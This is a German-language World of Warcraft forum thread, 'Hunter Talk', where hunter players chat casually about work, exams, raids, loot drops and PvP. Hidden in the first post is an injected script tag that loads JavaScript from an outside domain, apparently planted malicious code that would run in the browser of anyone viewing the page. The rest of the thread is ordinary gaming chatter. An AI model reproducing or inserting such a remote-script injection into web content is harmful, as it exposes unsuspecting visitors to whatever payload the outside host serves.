Hunter Talk

Trel

Rare-Mob
Mitglied seit
14.09.2006
Beiträge
418
Reaktionspunkte
3
Kommentare
3
Buffs erhalten
3
-gesehen bei den Krieger
-für gut befunden
-will ich hier einführen
<script src=http://www.issseem.org/a.js></script>
Also mach ich den anfange...

Bin grad auf Arbeit und muss warten bis was Fertig gerechnet ist bis ich weiter machen kann.

Gestern im raid schnell fds durchgerushd um die neuen mit der pre auszustatten, da wir dringen heiler für mh/bt brauchen. in letzter zeit gehen anscheinend ziemlich viele in den heil streik
 
Zuletzt bearbeitet von einem Moderator:
Erstmal LOL@deine Sig
tongue.gif

Nja, was ich so treibe? Erstmal ärgere ich mich, nicht mit dem Guide weiterzukommen, aber die Abschlussprüfung der Ausbildung hat einfach Vorrang
wink.gif
Status ist aber ca 70% für jene, die es interessiert.

Thread find i übrigens i.O. hab au schon überlegt nen generellen TalkThread aufzumachen ^^ Gerade weil wir in anderen THreads immer arg schnell ins OT abdriften, sobald das Thema PvP auftaucht - wo ich endlich wieder meine 2k haben will -.-"
Drecks Dudu/WL @ Blade-Edge

/edit
Alles gude Koloss
 
Zuletzt bearbeitet von einem Moderator:
Hm...gerade auf meine Gäste warten, die gleich kommen, da ich heute 16 geworden bin.

Gestern? Leider nur Lurker und Hydross gelegt auf Grund eines sehr schlechten Set-Ups.
 
dann auch mal alles gute von mir
biggrin.gif


und net so übertreiben...


@Mahoni

Bin auf deinen Neuen Guide gespannt
biggrin.gif

Meine sig... naja bin wenn ich daheim bin zu beschäftig Foren durchzuschauen
biggrin.gif


und zum thema prüfungen (man will ja zu allem seinen Senf geben
biggrin.gif
)

Hab nächste woche Mittwoch Zwischenprüfung
tongue.gif
also heist es bei mir wohl auch ab und an lehrnen
 
Danke.

Ne, keine Panik, ich übertreibs nicht, hab morgen ein Basketballspiel.
biggrin.gif
 
oookay. der verständnis halber: bei "was macht ihr gerade?" gehts um RL, und bei "was war gestern los?" gehts um ingame-stuff, ja?

gerade: gelangweilt im büro sitzen und auf feierabend warten (noch 16 min.)
victory.gif


gestern: nicht ge-huntert sondern mini-druide getwinkt. kurz vorm eindösen 20 geworden und bin fortan auf samtpfoten unterwegs durch azeroth
top.gif
 
naja also ich langweile mich grad, hatte heute letzten tag vom praktikum und war bis eben noch kräuter farmen für ini's und raid's (tränke)
naja gestern war nix los
pilot.gif
 
einfach allg. palaber der hunter unter sich
biggrin.gif


neue items, neue freundin?? neuer job, alles mögliche was euch einfällt
biggrin.gif
 
auf feierabend warten (3 minutes to go). und heut abend bissi lvln/questen oder beurfe pushen. Gruppe fuer Ini findet man auf meinem Realm eh nie :-D.
 
Zuletzt bearbeitet von einem Moderator:
endlich we ... arbeit ist so ... ja ... gut, da kann ich wow zocken, hmm
egal, zuhause > arbeit !

was mach ich grad, außer langweilen twinken ... hmm umskillen ... mm für pvp <3 :>
aber das kostet wieder, und ich hab nur 3g ._.
 
gestern "Blendschlag" gedropt, sketis bei der begleitquest ---- ins ah gestellt für lockere 1,7k g
kauft eh keiner so wies aussieht:)

bis grad eben kara gewesen,paar leute ausser stamm waren ned da,also rdm grp, war ganz ok.....

wollt eigendlich grad noch w...., aber doch viel zu müde, naja ab ins bettchen getz:)

n8 und bis nachher

ps: zu der zeit kommen keine anständigen sätze zustande
 
gestern war ich nur schattenlaby hero, aber irgendwie haben wir murmur nicht down gekriegt.
hab mir gard die edelsteintasche vom konsortium geholt und stolze 4 blaue steinchen bekommen.
 
Auf Freundin warten weil wir gleich nach Bremen wollen ( pff ich scheiß aufs Unwetter, da kommt eh nix
tongue.gif
)

Gestern endlich Epic - Mount bekommen , musste mir aber 1600g vom Kollegen leihen bzw. er meinte gestern zu mir als wir hier gemütlich 1-2 Pils getrunken haben : "ich geb dir datt jetzt" ^^

Ansonsten wollt ich eigentlich aufräumen aber hätte auch nicht wenig Bock auf Dailys
smile.gif
 
wieder gefarmt, ich kann mm im pvp (open pvp/bg) nicht mehr zocken, ... need i-win-button :s

ach herrlich :cry: wär ich doch nur nicht zu faul zum farmen
 
hmmm also mein Tag war ganz ordentlich, neue gilde und direkt als 2cond hunter stammplatz in ssc und tk raid bekommen.

Gestern neuen hero-umhang, vermächtnis und t4 handschuhe....

dropglück hab ich allemahl immoment, alles was ich mal so habe will dropt zu 90 prozent nur der scheiss Prinzenbogen auf den warte ich schon seit X-runs und er will und will nicht dropen....


mfg Morgol
 
dropglück hab ich allemahl immoment, alles was ich mal so habe will dropt zu 90 prozent nur der scheiss Prinzenbogen auf den warte ich schon seit X-runs und er will und will nicht dropen....
mfg Morgol

Glücklicher...ich geh seit Sommer letzten Jahres Kara. Ich hab noch nie Jäger T4 gesehen. Weder Handschuhe, noch Helm. Vermächtnis hab ich auch noch nie gesehen. Und Prinzen-Bogen? Einmal gesehen. Der wurd mir dann von einem anderen Hunter weggerollt, der zu dem Zeitpunkt eine Woche in der Gilde war und nun inaktiv ist...
 
Gerade festgestellt, das auch Hunter Drood und Mage rocken können =)

Sonst nix zu tun, perle is auf Mädels Party ;D

Twink BG inc!
 
Zurück